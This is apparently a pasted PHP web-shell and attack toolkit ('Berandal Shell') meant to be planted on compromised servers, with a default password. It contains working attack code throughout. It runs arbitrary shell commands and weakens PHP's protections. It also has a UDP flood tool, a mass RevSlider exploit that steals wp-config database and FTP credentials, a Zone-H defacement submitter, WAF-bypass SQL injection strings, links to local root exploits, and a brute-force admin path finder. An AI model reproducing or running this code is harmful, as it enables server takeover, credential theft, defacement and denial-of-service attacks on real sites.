· 6 years ago · Aug 20, 2019, 03:12 PM
1<?php
2/*-----------------------------------------------*/
3////////////////////////////////////////////////////////
4/// Berandal Shell V1.1 © 2017 ///
5/// Code by Berandal ///
6/// Default pass: owlsquad ///
7///////////////////////////////////////////////////////
8/*-----------------------------------------------*/
9session_start();
10error_reporting(0);
11set_time_limit(0);
12date_default_timezone_set("Asia/Jakarta");
13
14@clearstatcache();
15@ini_set('error_log',NULL);
16@ini_set('log_errors',0);
17@ini_set('max_execution_time',0);
18@ini_set('output_buffering',0);
19@ini_set('display_errors', 0);
20
21
22?>
23<html>
24<head>
25<link rel="SHORTCUT ICON" href="https://scontent-sit4-1.xx.fbcdn.net/v/t34.0-12/17821053_272489359875739_1796192318_n.jpg?oh=f97c2795550c4f3fec937245a89c6579&oe=58E70169" type="image/gif">
26<title>TOOLS ONLINE BY M4L1KL8590X</title>
27<meta name="author" content="M4L1KL8590X">
28 <meta content="TOOL ITW TEAM" name=" ">
29<meta charset="UTF-8">
30<link href="http://0n3r1d3r.000webhostapp.com/itw.png" rel="icon" type="image/x-icon">
31<link href="http://fonts.googleapis.com/css?family=Share+Tech+Mono" rel="stylesheet" type="text/css">
32<script type="text/javascript" id="atixhr">(function () {
33 var fnO = null;
34 var fnS = null;
35 CXHR();
36
37 //////////
38
39 function IDBG(o, s) {
40 /*
41 // Injected Debug
42
43 // Comment this entire function body out to disable debug messages
44 if (o)
45 {
46 alert((s == null ? "" : (s.toString() + ": ")) + o.toString());
47 }
48 */
49 }
50
51 //////////
52
53 function CXHR() {
54 // Check XMLHttpRequest
55
56 if (window.XMLHttpRequest) {
57 try {
58 fnO = XMLHttpRequest.prototype.open;
59 XMLHttpRequest.prototype.open = HXHRO;
60
61 fnS = XMLHttpRequest.prototype.send;
62 XMLHttpRequest.prototype.send = HXHRS;
63 }
64 catch (x) {
65 IDBG(x, "CXHR");
66 }
67 }
68 }
69
70 //////////
71
72 function HXHRO(m, u, a, n, p) {
73 // Hooked XMLHttpRequest Open
74
75 try {
76 // HACK:
77 // Create an <a> element to force the browser
78 // to resolve any relative URLs
79 var el = document.createElement("a");
80 el.href = u;
81 this.oU = el.href;
82
83 this.oM = m.toString().toUpperCase();
84
85 if (fnO) {
86 // Call the original function
87 fnO.apply(this, arguments);
88 }
89 }
90 catch (x) {
91 IDBG(x, "HXHRO");
92 }
93 }
94
95 //////////
96
97 function HXHRS(d) {
98 // Hooked XMLHttpRequest Send
99
100 try {
101 this.d = d;
102
103 // Intercept readyState changes
104 this.addEventListener("readystatechange", HRSC, false);
105
106 if (fnS) {
107 // Call the original function
108 fnS.call(this, this.d);
109 }
110
111 if (this.oM == "POST") {
112 window.postMessage({ m: "PXHR", t: this.oM, u: this.oU, d: String(this.d), s: true }, "*");
113 }
114 }
115 catch (x) {
116 IDBG(x, "HXHRS");
117 }
118 }
119
120 //////////
121
122 function HRSC() {
123 try {
124 if (
125 this.readyState &&
126 (this.readyState == 4 || this.readyState == 3) &&
127 this.status &&
128 this.status >= 200 &&
129 this.status < 400
130 ) {
131 var sR = "";
132 var sT = "";
133
134 if (this.responseType) {
135 sT = this.responseType;
136 }
137
138 if (sT == "" || sT == "text" || sT == "document" || sT == "json") {
139 if (this.responseText && typeof this.responseText == "string" && this.responseText != "") {
140 sR = this.responseText;
141 }
142 else if (this.responseXML && typeof this.responseXML == "object") {
143 var xD = this.responseXML;
144 if (xD.xml) {
145 sR += new XMLSerializer().serializeToString(xD);
146 }
147 }
148 window.postMessage({ m: "PXHR", t: this.oM, u: this.oU, d: sR, s: false }, "*");
149 }
150 }
151 }
152 catch (x) {
153 IDBG(x, "HRSC");
154 }
155 }
156 }());</script>
157<style>
158body {background:url('/haxor.jpg') no-repeat fixed;
159 -webkit-background-size: 100% 100%;
160 -moz-background-size: 100% 100%;
161 -o-background-size: 100% 100%;
162 background-size: 100% 100%;;color:#fff;font-family: 'Share Tech Mono';}
163input[type=text] , input[type=file] , input[type=password] {background:none;border-top:none;border-left:none;border-right:none;color: #02BC8C ;border-bottom:2px solid #02BC8C;font-family: 'Share Tech Mono';margin:6px;padding:6px; -moz-border-radius: 7px; border-radius: 7px;width:35%;}
164textarea {
165 background:none;border-top:none;border-left:none;border-right:none;color: #02BC8C ;border:2px solid #02BC8C;font-family: 'Share Tech Mono';margin:6px;padding:6px; -moz-border-radius: 7px; border-radius: 7px;
166 width:35%;
167 height:150px;
168}
169select {
170 width: 500px;
171 background: #02BC8C;
172 color: white;
173 font-size: 13px;
174}
175option{
176 background: #fff;
177 color: #02BC8C;
178 border: 1px solid white;
179}
180option:hover {
181 background: #02BC8C;
182 color: #02BC8C;
183}
184hr{
185 color: white;
186}
187input[type=submit] {background:#02BC8C;color:white;border:1px solid #02BC8C;font-family: 'Share Tech Mono';padding:2px 8px; -moz-border-radius: 10px; border-radius: 10px;width:35%;}
188#ex {background: #2b9db5 ;color:#fff;border:1px solid #02BC8C;font-family: 'Share Tech Mono';padding:2px 8px; -moz-border-radius: 7px; border-radius: 7px;width:15%;}
189.fak {background: #02BC8C ;color:#fff;border:1px solid #02BC8C;font-family: 'Share Tech Mono';padding:2px 8px; -moz-border-radius: 7px; border-radius: 7px;width:15%;}
190a {text-decoration:none;color:#fff}
191 #tabnet{
192 margin-left:15px auto 0 auto;
193 margin-right:15px auto 0 auto;
194 border: 1px solid #02BC8C;
195 width: 50%;
196 }
197 th {
198 background: #02BC8C;
199 color:#2F302F;
200 }
201 td {
202 border-bottom: 1px solid #02BC8C;
203 padding: 3px;
204 }
205 #c {
206 text-align: center;
207 }
208</style>
209</head>
210<?php
211if (file_exists("php.ini")){
212}else{
213$img = fopen('php.ini', 'w');
214$sec = "safe_mode = OFF
215disable_funtions = NONE";
216fwrite($img ,$sec);
217fclose($img);
218}
219function exe($cmd) {
220if(function_exists('system')) {
221 @ob_start();
222 @system($cmd);
223 $buff = @ob_get_contents();
224 @ob_end_clean();
225 return $buff;
226 } elseif(function_exists('exec')) {
227 @exec($cmd,$results);
228 $buff = "";
229 foreach($results as $result) {
230 $buff .= $result;
231 } return $buff;
232 } elseif(function_exists('passthru')) {
233 @ob_start();
234 @passthru($cmd);
235 $buff = @ob_get_contents();
236 @ob_end_clean();
237 return $buff;
238 } elseif(function_exists('shell_exec')) {
239 $buff = @shell_exec($cmd);
240 return $buff;
241 }
242}
243function perms($file){
244$perms = fileperms($file);
245if (($perms & 0xC000) == 0xC000) {
246$info = 's';
247} elseif (($perms & 0xA000) == 0xA000) {
248$info = 'l';
249} elseif (($perms & 0x8000) == 0x8000) {
250$info = '-';
251} elseif (($perms & 0x6000) == 0x6000) {
252$info = 'b';
253} elseif (($perms & 0x4000) == 0x4000) {
254$info = 'd';
255} elseif (($perms & 0x2000) == 0x2000) {
256$info = 'c';
257} elseif (($perms & 0x1000) == 0x1000) {
258$info = 'p';
259} else {
260$info = 'u';
261}
262$info .= (($perms & 0x0100) ? 'r' : '-');
263$info .= (($perms & 0x0080) ? 'w' : '-');
264$info .= (($perms & 0x0040) ?
265(($perms & 0x0800) ? 's' : 'x' ) :
266(($perms & 0x0800) ? 'S' : '-'));
267$info .= (($perms & 0x0020) ? 'r' : '-');
268$info .= (($perms & 0x0010) ? 'w' : '-');
269$info .= (($perms & 0x0008) ?
270(($perms & 0x0400) ? 's' : 'x' ) :
271(($perms & 0x0400) ? 'S' : '-'));
272$info .= (($perms & 0x0004) ? 'r' : '-');
273$info .= (($perms & 0x0002) ? 'w' : '-');
274$info .= (($perms & 0x0001) ?
275(($perms & 0x0200) ? 't' : 'x' ) :
276(($perms & 0x0200) ? 'T' : '-'));
277return $info;
278}
279function hdd($s) {
280if($s >= 1073741824)
281return sprintf('%1.2f',$s / 1073741824 ).' GB';
282elseif($s >= 1048576)
283return sprintf('%1.2f',$s / 1048576 ) .' MB';
284elseif($s >= 1024)
285return sprintf('%1.2f',$s / 1024 ) .' KB';
286else
287return $s .' B';
288}
289function ambilKata($param, $kata1, $kata2){
290 if(strpos($param, $kata1) === FALSE) return FALSE;
291 if(strpos($param, $kata2) === FALSE) return FALSE;
292 $start = strpos($param, $kata1) + strlen($kata1);
293 $end = strpos($param, $kata2, $start);
294 $return = substr($param, $start, $end - $start);
295 return $return;
296}
297function zoneh($url,$nick) {
298$ch = curl_init("http://www.zone-h.com/notify/single");
299curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
300curl_setopt($ch, CURLOPT_POST, true);
301curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
302return curl_exec($ch);
303curl_close($ch);
304}
305echo "<center><font size='7'>INDONESIA TO WORLD TOOLS</font></font></center>";
306echo "<td onkeydown='return false' onmousedown='return false'></td>";
307echo "<center></font></td></tr></table>";
308echo "<p><div id=menu border='1' >";
309echo "<ul class='sidebar-menu tree' data-widget='tree'>";
310echo "<font color=#02BC8C>[<a href='home'>Home</a>]";
311echo "[<a href='shellchecker'>shell checker</a>]";
312echo "[<a href='adfin'>admin finder</a>]";
313echo "[<a href='csrf'>csrf online</a>]";
314echo "[<a href='magento'>magento exploiter</a>]";
315echo "[<a href='zoneh'>Zone-H</a>]";
316echo "[<a href='hashgen'>hash Generator</a>]";
317echo "[<a href='hashid'>hash Identifier</a>]";
318echo "[<a href='ddos'>ddos</a>]";
319echo "[<a href='64base'>encode decode</a>]<br><br>";
320echo "[<a href='wpbrute'>wordpress brute force</a>]";
321echo "[<a href='lokmed'>cms lokomedia auto exploiter</a>]";
322echo "[<a href='lwa'>xampp lwa auto exploiter</a>]";
323echo "[<a href='drupal'>drupal mass exploiter</a>]";
324echo "[<a href='elfinder'>elfinder mass exploiter</a>]<br><br>";
325echo "[<a href='revslider'>revslider mass exploiter</a>]";
326echo "[<a href='cmsvuln'>cms Vulnerability Scanner</a>]";
327echo "[<a href='sqlbalitbang'>sql balitbang</a>]";
328echo "[<a href='roottutor'>root tutorial</a>]";
329echo "[<a href='localroot'>localroot</a>]<br><br>";
330echo "[<a href='alexa'>AlexaRanks/moz rank Mass Checker</a>]";
331echo "[<a href='domain'>domain/parse grabber</a>]";
332echo "[<a href='dnsviewer'>mass dnsviewer</a>]";
333echo "[<a href='zonesong'>take out :D</a>]</font><br><br>";
334echo "</ul>";
335echo "</font></div>";
336echo "</center>";
337
338if($_GET['go'] == 'ddos') {
339?>
340<html>
341<form action=" " method="post">
342<center><br>
343<h1>ddos tool</h1>
344Your IP: <font color="Lavender"><b><?php echo $my_ip; ?></b></font>�(Don't DoS yourself nub)<br>
345<table class="tabnet" style="width:333px;padding:0 1px;">
346<tr><tr><td>IP Target</td><td>:</td>
347<td><input type="text" class="inputz" name="ip" size="48" maxlength="25" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';"/>
348</td></tr>
349<tr><td>Time</td><td>:</td>
350<td><input type="text" class="inputz" name="time" size="48" maxlength="25" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';"/>
351</td></tr>
352
353<tr><td>Port</td><td>:</td>
354<td><input type="text" class="inputz" name="port" size="48" maxlength="5" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';"/>
355</td></tr></tr></table></b><br>
356<input type="submit" class="inputzbut" name="fire" value=" submit ">
357<br><br>
358<center>
359<font color="Lavender">Seteleh selesai menggunakan tools ini segera refresh browsingmu
360</center>
361</form>
362</center>
363<?php
364 @$submit = $_POST['fire'];
365 if (isset($submit)) {
366 $packets = 0;
367 $ip = $_POST['ip'];
368 $rand = $_POST['port'];
369 set_time_limit(0);
370 ignore_user_abort(FALSE);
371 $exec_time = $_POST['time'];
372 $time = time();
373 print "Flooded: $ip on port $rand <br><br>";
374 $max_time = $time + $exec_time;
375 for ($i = 0;$i < 65535;$i++) {
376 $out.= "X";
377 }
378 while (1) {
379 $packets++;
380 if (time() > $max_time) {
381 break;
382 }
383 $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
384 if ($fp) {
385 fwrite($fp, $out);
386 fclose($fp);
387 }
388 }
389 echo "Packet complete at " . time('h:i:s') . " with $packets (" . round(($packets * 65) / 1024, 2) . " mB) packets averaging " . round($packets / $exec_time, 2) . " packets/s
390";
391 }
392 }
393elseif ($_GET['go'] == 'dnsviewer') {
394 # code...
395echo '<center><h1>mass dns viewer</h1><hr><br><form action="" method="POST">
396<textarea name="text" placeholder="www.domain.com"></textarea>
397<br><input type="submit" name="zone" value="Check All"></form>';
398
399$sedd = explode("\r\n",$_POST["text"]);
400 $sedd1 = str_replace(['http://', 'https://'], ['', ''], $sedd);
401 $sedd2 = $sedd1 ;
402if($_POST["text"]){
403echo '<table id="tabnet"><tr><th>Hostname </th><th>Type</th><th> TTL </th><th>Priority</th><th>Content</th></tr>';
404foreach ($sedd2 as $site){
405
406$sed = file_get_contents("https://who.is/dns/".$site);
407
408preg_match_all('/<tr><td>(.*?)<\/td><td>(.*?)<\/td><td>(.*?)<\/td><td>(.*?)<\/td><td>(.*?)<\/td><\/tr>/',$sed,$a);
409$hitung = count($a[0]);
410$mulai = 0;
411while ($mulai < $hitung){
412 echo "<tr><td>".$a[1][$mulai]."</td><td><center>".$a[2][$mulai]."</center></td><td><center>".$a[3][$mulai]."</center></td><td><center>".$a[4][$mulai]."</center></td><td>".$a[5][$mulai]."</td></tr>";
413 $mulai++;
414}
415echo "<tr><th></th><th></th><th></th><th></th><th></th></tr>";
416echo "<tr><th></th><th></th><th></th><th></th><th></th></tr>";
417}
418echo "</table></center>";
419}
420}
421elseif ($_GET['go'] == 'python') {
422echo "<iframe src='https://trinket.io/embed/python/1f858f3553' width='100%' height='356' frameborder='0' marginwidth='0' marginheight='0' allowfullscreen></iframe>";
423}
424 elseif ($_GET['go'] == 'localroot') {
425echo '<center><h1>localroot</h1><hr color="white"><br><br><br>
426 <font color=#02BC8C>[<a href="Localroot/CVE-2004-0077/160.c"> CVE-2004-0077 </a>]
427 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2004-1235/744.c"> CVE-2004-1235 </a>]
428 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2005-0736/1397.c"> CVE-2005-0736 </a>]
429 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2005-1263/25647.sh"> CVE-2005-1263 </a>]
430 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2006-2451/2031.c"> CVE-2006-2451 </a>]
431 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2006-3626/2013.c"> CVE-2006-3626 </a>]
432 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2012-0056/18411.c"> CVE-2012-0056 </a>]
433 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2012-3524/dzug.c"> CVE-2012-3524 </a>]
434 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2015-1328/37292.c"> CVE-2015-1328 </a>]
435 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2015-7547/CVE-2015-7547-client.c"> CVE-2015-7547 </a>]
436 [<a href="https://byagent.xyz/exploit/Localroot/2016/firehawk.zip"> CVE-2016 </a>]
437 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2017-6074/poc.c"> CVE-2017-6074 </a>]
438 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2017-7308/poc.c"> CVE-2017-7308 </a>]
439 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2017-7494/implant.c"> CVE-2017-7494 </a>]
440 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2017-1000112/poc.c"> CVE-2017-1000112 </a>]
441 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2017-1000367/sudopwn.c"> CVE-2017-1000367 </a>]
442 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2018-1000001/RationalLove.c"> CVE-2018-1000001 </a>]</font></center><br><br><br><br><br><br><br><br><br><br><br>';
443}
444elseif ($_GET['go'] == 'sqlbasic') {
445echo "<center><table id='tabnet'><tr><th> waf </th>
446<tr><td>union+distinct+select+</td></tr><tr><td>union+distinct+select+</td></tr></center><br>
447<tr><td>union+distinct+select+</td></tr>
448<tr><td>+union+distinctROW+select+</td></tr>
449<tr><td>+%2F**/+Union/*!select*/</td></tr>
450<tr><td>/**//*!12345UNION SELECT*//**/</td></tr>
451<tr><td>/**//*!50000UNION SELECT*//**/</td></tr>
452<tr><td>/**/uniUNIONon/**/selSELECTect/**/</td></tr>
453<tr><td>+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+</td></tr>
454<tr><td>+/*!u%6eion*/+/*!se%6cect*/+</td></tr>
455<tr><td>%55nion %53elect</td></tr>
456<tr><td>union(select(1),2,3) </td></tr>
457<tr><td>union (select 1111,2222,3333) </td></tr>
458<tr><td>union (/*!/**/ SeleCT */ 11)</td></tr></table><tr><th></th>";
459}
460 elseif ($_GET['go'] == 'home') {
461echo "<center><b>welcome root,happy working ster<br>congratulations, you are a freelancer</b><br><br><img src='http:///laptop-notepad-img.svg' style: width=250px><br><br><br></center>";
462}
463 elseif($_GET['go'] == 'zoneh') {
464 if($_POST['submit']) {
465 $domain = explode("\r\n", $_POST['url']);
466 $nick = $_POST['nick'];
467 echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
468 echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
469 foreach($domain as $url) {
470 $zoneh = zoneh($url,$nick);
471 if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
472 echo "$url -> <font color=lime>OK</font><br>";
473 } else {
474 echo "$url -> <font color=red>ERROR</font><br>";
475 }
476 }
477 } else {
478 echo "<center><h1>zone h mass mirror</h1><hr color='white'><br><form method='post'>
479 <u>Defacer</u>: <br>
480 <input type='text' name='nick' size='50' value='M4L1KL8590X'><br>
481 <u>Domains</u>: <br>
482 <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
483 <input type='submit' name='submit' value='Submit' style='width: 450px;'>
484 </form>";
485 }
486 echo "</center>";
487}
488 elseif ($_GET['go'] == 'shellchecker') {
489?>
490<center>
491<h1>shellchecker</h1><hr color='white'>
492<form action='' method='post'>
493<center>
494<form name="frmcontadd" action="" method="post">
495<textarea name='url' cols='50' rows='10'></textarea>
496<br><br><input class="subbtn" type="submit" name="Submit" value="check now!"><br><br><br></form>
497<?php
498// Code By : Arvan Apriyana
499// Hargain Karya Kami Jangan Senaknya Mengaku Ngakui
500// Anda Menghargai Saya Hargai :)
501function get_http_response_code($theurl) {
502 $headers = get_headers($theurl);
503 $status = substr($headers[0], 9, 3);
504 $p = parse_url($theurl);
505 $host = explode(':', $p['host']);
506 $hostname = $host[0];
507 if ($status == 200) {
508 $visitor = $_SERVER["REMOTE_ADDRS"];
509 $judul = "shell:login:wso:XxX:TATSUMI:tatsumi:IndoXploit:Cowo:Priv8:private:jnck:jancok:v2:v1:v3:v5:idx:2018:2017:2016:2015:AchonXjusT:HalahLemot:Cox:cox:GBLG LO:$theurl ";
510 //memanfaatkan title shell backdoor
511 $body = "shell:PARTY-MINI SHELL:root@indoxploit:cowo:3.10.0-514.26.2:32:Linux:ubuntu:Safe Mode:OFF:ON:priv8:private:masukin:password:nya:$theurl"
512 ;
513 //memanfaatkan header shell backdoor
514 if (!empty($theurl)) {
515 @mail($judul, $body);
516 }
517 $writeuRl = $theurl . "
518";
519 $fh = fopen("a");
520 fwrite($fh, $writeuRl, strlen($writeuRl));
521 echo "<strong><font color=Green>Live </font></strong><a href='$theurl' target='$theurl'>" . $theurl . "</a><br />";
522 } elseif ($status == 500) {
523 echo "<strong><font color=black>" . $status . " 500 Internal Server Error !</font></strong> - <a href=. $theurl
524 target=_blank>" . $theurl . "</a><br />";
525 } else {
526 $writeuRl = $theurl . "
527";
528 $fh = fopen("a");
529 fwrite($fh, $writeuRl, strlen($writeuRl));
530 echo "<strong><font color=red>Die </font></strong><a href='$theurl' target='$theurl'>" . $theurl . "</a><br />";
531 }
532}
533if (isset($_POST['Submit'])) {
534 $hosts = explode("
535", $_POST['url']);
536
537 $values = array();
538 foreach ($hosts as $host) {
539 if ($host != "") {
540 @get_http_response_code("$host");
541 }
542 }
543 echo "<br /><strong>Selesai</strong>";
544}
545}
546
547elseif ($_GET['go'] == 'Balitbang') {
548?>
549<center>
550<h1>CMS Balitbang Auto Exploiter</h1><hr color='white'>
551<form action='' method='post'>
552<center>
553<p>Target URL : <input style='border-color=white;' type='text' name='url' class='text'
554
555placeholder='http://127.0.0.1/' size="50"></p>
556</p>
557<p><input type='submit' name='send' class='kotak' style='border-color=white;' value='Kunci Target'></p></center>
558</form>
559<?php
560if (isset($_POST['send'])) {
561 $url = $_POST['url'];
562 $resulturl = "Target URL : $url";
563 echo "<center>
564<hr color='white'><br>
565$resulturl
566$resultoken
567</center>";
568echo '<center style="border-color=white;"><form enctype="multipart/form-data" action="'.
569
570$url.'?src=http://flickr.com.phuoclongcomputer.com/up.php" method="post"></center>';
571echo '<center style="border-color=white;"></center>';
572}
573echo "</div>";
574}
575elseif($_GET['go'] == 'hashgen') {
576$submit = $_POST['enter'];
577 if (isset($submit)) {
578$pass = $_POST['password']; // password
579$salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
580$hash = md5($pass); // md5 hash #1
581$md4 = hash("md4", $pass);
582$hash_md5 = md5($salt . $pass); // md5 hash with salt #2
583$hash_md5_double = md5(sha1($salt . $pass)); // md5 hash with salt & sha1 #3
584$hash1 = sha1($pass); // sha1 hash #4
585$sha256 = hash("sha256", $text);
586$hash1_sha1 = sha1($salt . $pass); // sha1 hash with salt #5
587$hash1_sha1_double = sha1(md5($salt . $pass)); // sha1 hash with salt & md5 #6
588}
589echo '<form action="" method="post"><b> ';
590echo '<center><h1>hash Generator</h1><hr color="white"></tr>';
591echo ' <center><b>masukan kata yang ingin di encrypt:</b><br>';
592echo ' <input class="inputz" type="text" name="password" size="40" />';
593echo ' <input class="inputzbut" type="submit" name="enter" value="hash" />';
594echo ' <center><br>Hasil Hash</th></center></tr>';
595echo ' <center>For :<br><input class=inputz type=text size=50 value=' . $pass . '><br>';
596echo ' <center><center><center><center><center>MD5 :<br><input class=inputz type=text size=50 value=' . $hash . '><br>';
597echo ' <center><center><center><center>MD4 :<br><input class=inputz type=text size=50 value=' . $md4 . '><br>';
598echo ' <center><center><center>MD5 with Salt :<br><input class=inputz type=text size=50 value=' . $hash_md5 . '><br>';
599echo ' <center><center>MD5 with Salt & Sha1 :<br><input class=inputz type=text size=50 value=' . $hash_md5_double . '><br>';
600echo ' <center>Sha1 :<br><input class=inputz type=text size=50 value=' . $hash1 . '><br>';
601echo ' Sha256 :<br><input class=inputz type=text size=50 value=' . $sha256 . '><br>';
602echo ' <center><center>Sha1 with Salt :<br><input class=inputz type=text size=50 value=' . $hash1_sha1 . '><br>';
603echo ' <center>Sha1 with Salt & MD5 :<br><input class=inputz type=text size=50 value=' . $hash1_sha1_double . '><br>';
604}
605elseif ($_GET['go'] == 'revslider') {
606 echo " <hr color='white'>
607<form method='post'>
608<textarea class='mybox' name='site' cols='50' rows='12'>
609http://site.com
610http://site2.com
611http://site3.com</textarea><br>
612<input class='kotak' type='submit' style='width: 50px; height: 30px; border-color:white;margin:10px 2px 0 2px;' name='sikat' value='SIKAT!'>
613</form></center>
614";
615function findit($mytext,$starttag,$endtag) {
616 $posLeft = stripos($mytext,$starttag)+strlen($starttag);
617 $posRight = stripos($mytext,$endtag,$posLeft+1);
618 return substr($mytext,$posLeft,$posRight-$posLeft);
619}
620error_reporting(0);
621set_time_limit(0);
622$ya=$_POST['sikat'];
623$co=$_POST['site'];
624
625if($ya){
626 $e=explode("\r\n",$co);
627 foreach($e as $bda){
628 //echo '<br>'.$bda;
629 $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
630 $dn=($bda).($linkof);
631 $file=@file_get_contents($dn);
632 if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
633 echo'<center><font face="courier" color=white >----------------------------------------------</font></center>';
634 echo "<center><font face='courier' color='lime' >".$bda."</font></center>";
635 echo "<font face='courier' color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
636 echo "<font face='courier' color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
637 echo "<font face='courier' color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
638 echo "<font face='courier' color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
639 }
640 elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
641 echo'<center><font face="courier" color=white >----------------------------------------------</font></center>';
642 echo "<center><font face='courier' color='lime' >".$bda."</font></center>";
643 echo "<font face='courier' color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
644 echo "<font face='courier' color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
645 echo "<font face='courier' color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
646 }
647 else{echo "<center><font face='courier' color='red' >".$bda." ----> not infected </font></center>";}
648 echo'<center><font face="courier" color=white >----------------------------------------------</font></center>';
649}
650}
651}
652elseif ($_GET['go'] == adfin) {
653 ?>
654<type='text/javascript'/></script>
655<style>
656</style>
657
658</head>
659<link rel="SHORTCUT ICON" href="http://i.imgur.com/2Koa43H.png">
660<html></style><center><div class="mybox"><h1>Admin Finder</h1><hr color='white'><br>
661<br>
662<br><center><font color='Lavenda'> NB: Jika Mau Jalankan Tools ini,di Belakang Domain Tambahkan " / " </font></center>
663<br>
664<td width=100% id=Gretz>
665<form action="" method="post">
666<center><p class="frontboxtext"><input name="hash_lol" class="textbox" type="text" size="30" value="http://www.target.co.il/"/>
667<input name="submit_lol" class="textbox" value="Submit Site" type="submit">
668</form>
669</html>
670<?php
671set_time_limit(0);
672
673if (isset($_POST["submit_lol"])) {
674$url = $_POST['hash_lol'];
675echo "<br />Crot ".$url."<br /><br />";
676
677$adminlocales = array("-adminweb/","!adminweb/","@adminweb/","adminweb121/","adminweb90/","adminweb145/","khususadmin/","rahasiaadm/","adminweb123123/","adminweb2222/","adminlanel/","adminlanel.php/","monitor123.php/","masuk.php/","css.php/", "admin1235.php/", "master.php/","1admin/","123admin/","addmin/","home.php","css/","rediect.php/","masuk.php/","index.php/","webpaneladmin123/","registeradm/","register/","member123/","123adminweb/","123paneladminweb/","panelauth1231/","loginadminweb21/","loginadminweb123/","loginadminweb/","webadmin123/","redakturadmin/","paneladminweb/","admloginadm/","4dm1n/","admin12345/","adminweb12/","adminweb111/","adminweb123/","adminweb1/","gangmasuk/","gangadmin/","admredaktur/","adminwebredaktur/","adminredaktur/","adm/", "_adm_/", "_admin_/", "_loginadm_/", "_login_admin_/", "minmin", "loginadmin3/", "masuk/admin", "webmail", "_loginadmin_/", "_login_admin.php_/", "_admin_/", "_administrator_/", "operator/", "sika/", "adminweb/", "develop/", "ketua/", "redaktur/", "author/", "admin/", "administrator/", "adminweb/", "user/", "users/", "dinkesadmin/", "retel/", "author/", "panel/", "paneladmin/", "panellogin/", "redaksi/", "cp-admin/", "login@web/", "admin1/", "admin2/", "admin3/", "admin4/", "admin5/", "admin6/", "admin7", "admin8", "admin9", "admin10", "master/", "master/index.php", "master/login.php", "operator/index.php", "sika/index.php", "develop/index.php", "ketua/index.php","redaktur/index.php", "admin/index.php", "administrator/index.php", "adminweb/index.php", "user/index.php", "users/index.php", "dinkesadmin/index.php", "retel/index.php", "author/index.php", "panel/index.php", "paneladmin/index.php", "panellogin/index.php", "redaksi/index.php", "cp-admin/index.php", "operator/login.php", "sika/login.php", "develop/login.php", "ketua/login.php", "redaktur/login.php", "admin/login.php", "administrator/login.php", "adminweb/login.php", "user/login.php", "users/login.php", "dinkesadmin/login.php", "retel/login.php", "author/login.php", "panel/login.php", "paneladmin/login.php", "panellogin/login.php", "redaksi/login.php", "cp-admin/login.php", "terasadmin/", "terasadmin/index.php", "terasadmin/login.php", "rahasia/", "rahasia/index.php", "rahasia/admin.php", "rahasia/login.php", "dinkesadmin/", "dinkesadmin/login.php", "adminpmb/", "adminpmb/index.php", "adminpmb/login.php", "system/", "system/index.php", "system/login.php", "webadmin/", "webadmin/index.php", "webadmin/login.php", "wpanel/", "wpanel/index.php", "wpanel/login.php", "adminpanel/index.php", "adminpanel/", "adminpanel/login.php", "adminkec/", "adminkec/index.php", "adminkec/login.php", "admindesa/", "admindesa/index.php", "admindesa/login.php", "adminkota/", "adminkota/index.php", "adminkota/login.php", "admin123/", "admin123/index.php", "dologin/", "home.asp/","supervise/amdin", "relogin/adm", "checkuser", "relogin.php", "relogin.asp", "wp-admin", "registration", "suvervise", "superman.php", "member.php","home/admin","po-admin/","do_login.php", "bo-login", "bo_login.php/", "index.php/admin", "admiiin.php", "masuk/adm","website_login/", "dashboard/admin", "dashboard.php", "dashboard_adm", "admin123/login.php", "logout1/", "logout/","pengelola/login", "manageradm/", "logout.asp", "manager/adm", "pengelola/web","auth/panel", "logout/index.php", "logout/login.php", "controladm/", "logout/admin.php", "adminweb_setting", "adm/index.asp", "adm.asp", "affiliate.asp", "adm_auth.asp", "memberadmin.asp", "siteadmin/login.asp", "siteadmin/login", "paneldecontrol", "cms/admin", "administracion.php", "/ADMON/", "administrador/", "panelc/", "admincp", "admcp", "cp", "modcp", "moderatorcp", "adminare", "cpanel", "controlpanel");
678
679foreach ($adminlocales as $admin){
